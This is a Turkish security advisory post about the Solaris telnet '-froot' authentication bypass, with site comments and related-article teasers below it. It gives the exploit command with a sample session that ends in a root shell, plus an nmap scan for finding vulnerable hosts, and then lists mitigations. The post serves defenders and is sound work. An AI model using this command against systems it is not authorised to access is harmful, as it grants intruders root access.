Solaris Sistemlerde Ciddi Güvenlik Açığı

0
FZ
Dün yayınlanan ve sadece Sun Solaris 10, Solaris 11 işletim sistemlerini etkileyen güvenlik açığı telnet servisine herhangi bir sistem kullanıcısının parolasız bağlanabilmesini sağlıyor. Eğer root kullanıcısının telnet erişim yetkisi varsa bu, parolayı bilmeden sisteme tam yetkili erişilmesi manasına geliyor. Benzer bir açık 1994 yılında bazı UNIX sistemlerinde de görülmüştü.

Güvenlik açığını nasıl test edersiniz?

$telnet -l -fkullanici_adi hedef_sistem

fbsd~$ telnet -l -froot 10.1.1.1

Trying 10.1.1.1...

Connected to 10.1.1.1.

Escape character is '^]'.

[ Trying mutual KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

[ Trying KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

Last login: Mon Feb 12 15:20:12 on console

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005

Sourcing //.profile-EIS.....

root@solaris-test #

Ek olarak ağınızdaki Solaris tabanlı telnet sunucuları bulmak için nmap kullanabilirsiniz.

#nmap -sV  -p23 AĞ_Bloğunuz -oG solaris_telnet|grep "Sun Solaris"

Korunma Yolları

1) Solaris sistemden telnet servisi kapatılıp yerine daha güvenli erişim yöntemi olan SSH tercih edilebilir.

Telneti kapatmak için

solaris-test# svcadm disable telnet

2)Telnet servisi açık kalması gerekiyorsa öncelikle sisteme root kullanıcısının erişimi kısıtlanmalı. Bu en azından sisteme en yetkili hesapla bağlanılmasını engeller fakat sistemdeki diğer kullanıcıların(sys,adm, lp, vs.) sisteme parolasız erişimi hala mümkün olmaktadır.

Adım Adım telnet ile sisteme root erişimini engellemek /etc/default/login dosyası açılır. #CONSOLE=/dev/console satırı bulunur ve başındaki # kaldırılır. 3)Telnet servisine yapılan erişimler IP tabanlı kısıtlanabilir. Bunun için Solaris'de tcp_wrapper ve IPF kullanılabilir. Telnet servisi için tcp_wrapper desteğini aktif ederek telnet servisine yapılan erişimler ip/network tabanlı kısıtlamak için,

Telnet servisine için tcp_wrapper desteği verilir

#inetadm -m telnet tcp_wrappers=TRUE

ve /etc/hosts.allow, /etc/hosts.deny dosyaları kullanılarak belirli IP/ağlara erişim tanımlanır.

Huzeyfe ÖNAL - huzeyfe at enderunix.org

Görüşler

0
elrond
Şaka gibi bir açık bu. Şirkette adminlere söyledim kapatın şu rezillikleri diye inanmadılar ilk başta...

Asıl garip olan niye şimdi public oldu...
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Gizli Mesajınızı Spam Mail İçinde Saklayın!

ts

Şifreli yazışmak icin kullanilabilecek birçok yöntem bulunuyor. Bunların içinde en ilginci ise Spammimic adında bir sitede bulunuyor.

Bu sitede istenilen yazı bir spam mail'in içerisine gizleniyor ve Spammimic internet sitesinde çözülmediği takdirde gerçek mesaja ulaşılamıyor.

Editörün Notu: Eğlenceli bir yazılım, gramer steganografisi gibi görülebilir ancak ciddi olarak kullanılabilecek türden bir uygulamaya benzemiyor.

Web Güvenliği E-Dergi 2. Sayı

anonim

Web Güvenlik Topluluğu tarafından hazırlanan, iki aylık periyotlarda yayımlanması planlanan web güvenliği e-dergi`nin Ağustos 2009`da yayımlanan ilk sayısından sonra, Ekim 2009 2. sayısı da yayımlandı.

Kodlama Teorisi, Şifreleme ve Bir Akşam Yemeği

FZ

1984 Nisan ayı. Zurich'teki bir konferansta bir akşam yemeği sonrası, Prof. James Massey'in davetlisi olan John Gordon, kodlama teorisi, şifreleme, iletişim güvenliği üzerine en az, az önce yedikleri yemek kadar leziz bir konuşma yapar.

Konuşmasına güvenlik dünyasının meşhur ve gizemli karakterleri Alice ve Bob'un olası hayat hikayelerini yeniden kurarak başlayan Gordon gayet eğlenceli bir şekilde ve sinsice kodlama teorisi, güvenlik analizi, iletişim güvenliği gibi konulara geçer.

Sonra mı? :-)

Okuyun ve görün. İyi eğlenceler.

iPhone Hediyeli Hacking Yarışması!

anonim

IstSec ‘09 – İstanbul Bilgi Güvenliği Konferansı’nın ikinci günü yapılacak Capture The Flag yarışmasına katılarak son model bir iPhone(iPhone 3Gs) kazanma şansı elde edebilirsiniz.

CTF yarışması gerçek hayatta sistem adminleri, network adminleri ve güvenlik adminlerinin yaptığı hataları simüle eden bir yarışmadır ve toplam 11 adımdan oluşmaktadır.

Mozilla Suite - Firefox - Netscape IDN Host Remote Buffer Overflow Exploit

y0rk

Mozilla suite için nurtopu gibi bir bug daha bulundu. Detay için http://www.frsirt.com/...
Henüz yayınlanmış bir yama yok.